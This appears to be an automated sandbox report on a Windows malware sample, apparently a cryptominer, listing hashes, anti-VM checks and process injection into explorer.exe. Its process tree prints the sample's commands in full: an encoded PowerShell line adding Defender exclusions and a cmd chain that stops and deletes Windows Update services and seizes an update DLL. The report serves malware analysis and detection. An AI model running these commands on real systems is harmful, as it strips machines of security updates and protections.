Analysis
max time kernel: 300s
max time network: 297s
platform: windows10-2004_x64
resource: win10v2004-20220812-en
resource tags: arch:x64 arch:x86 image:win10v2004-20220812-en locale:en-us os:windows10-2004-x64 system
submitted: 24-10-2022 15:59
Behavioral task
behavioral1
Sample
2.exe
Resource
win7-20220812-en
General
Target: 2.exe
Size: 7.4MB
MD5: 8ddc35d10e70c08abd8a15a787d3b586
SHA1: 08219f2e68c5e72a7d218d63cea15bf8db5aff6c
SHA256: 057e1aaca82b095ce425737bb5108155c8717868276e68a9fa93084850d2a585
SHA512: 99046db0247aebc545daf5e5380a28edec47dffe0b9d036d504bff8616c7c39d2deaa088dac8fe779e497d9b060c76bcb423600426faa70e9ac896de342ed79a
SSDEEP: 196608:qs7RTqMym+7SHwnuyFAHqEs4ezo22zS9nln606:T7Y11nu+cso2PlnQ
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exe
description | ioc | process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo | reg.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
2.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 2.exe
Drops file in Drivers directory 1 IoCs
Processes:
conhost.exe
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | conhost.exe
Executes dropped EXE 1 IoCs
Processes:
explorer.exe
pid | process
4352 | explorer.exe
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exe, icacls.exe
pid | process
4812 | takeown.exe
2216 | icacls.exe
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
2.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2.exe
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exe, icacls.exe
pid | process
4812 | takeown.exe
2216 | icacls.exe
Processes:
resource | yara_rule
behavioral2/memory/4960-132-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
behavioral2/memory/4960-133-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
behavioral2/memory/4960-135-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
behavioral2/memory/4960-136-0x0000000000400000-0x00000000010DC000-memory.dmp | themida
Processes:
2.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 2.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
Processes:
2.exe
pid | process
4960 | 2.exe
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exe
description | pid | process | target process
PID 3452 set thread context of 4352 | 3452 | conhost.exe | explorer.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes:
sc.exe
pid | process
2356 | sc.exe
3120 | sc.exe
3036 | sc.exe
1088 | sc.exe
4640 | sc.exe
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exe
pid | process
2840 | reg.exe
4004 | reg.exe
4168 | reg.exe
3092 | reg.exe
2432 | reg.exe
1296 | reg.exe
3580 | reg.exe
1868 | reg.exe
4604 | reg.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exe, explorer.exe
pid | process
2024 | powershell.exe
4352 | explorer.exe
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid | process
660 |
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exe, powercfg.exe, takeown.exe, explorer.exe
description | pid | process
Token: SeDebugPrivilege | 2024 | powershell.exe
Token: SeShutdownPrivilege | 2384 | powercfg.exe
Token: SeCreatePagefilePrivilege | 2384 | powercfg.exe
Token: SeShutdownPrivilege | 3524 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3524 | powercfg.exe
Token: SeShutdownPrivilege | 3688 | powercfg.exe
Token: SeCreatePagefilePrivilege | 3688 | powercfg.exe
Token: SeShutdownPrivilege | 4436 | powercfg.exe
Token: SeCreatePagefilePrivilege | 4436 | powercfg.exe
Token: SeTakeOwnershipPrivilege | 4812 | takeown.exe
Token: SeLockMemoryPrivilege | 4352 | explorer.exe
Token: SeLockMemoryPrivilege | 4352 | explorer.exe
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGEAbwBmACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbgBsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAGsAdgBwAHEAIwA+ACAAQAAoACAAPAAjAHIAdgBhACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwB0AHUAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARgBpAGwAZQBzACkAIAA8ACMAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG8AaQAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\explorer.exeC:\Windows\explorer.exe aanewtbrhdbz1 GoySvqjslEz2cJjLp/l+rjzn6ce4jALjhSdARaKlIdOzscb8uSA4DC45OD1DpPEqiKy9RognxgdgL26xl6pHcgBuSDH82m22H2uTx/gYzO827+5kpstbfmCCWwx/haNMZTpvRN2AWJn3nj807NkQH/uc5YsiTBf742xyjDXcUT/RYfnhcLyzybIWgXn+7JafUmbaP5sh35EaxsiGFShuRY1L5Fi1uvVZnjU0an3bePXHEXYChHiocVdekR4gVKAc85wY8WomQkvNXfo8OnI8G68t0jyGDhrkDKs7kWaJz2DMj5MokwVvSUi2Y2TsrAP/kRRORiyYEXQjlDWVnkLqznS8gWE6k3nXSMLi6nDwXFvazQSyw8+toWHTrnijZtUQ24/815/zhCZs1iAzqCrMGLeWXdJqAzh1OZvKAkAlE5F0/M1ZedWuCT9hZ79EApH/3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
-
\Users\Admin\AppData\Roaming\2BF.tmp
MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512: cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e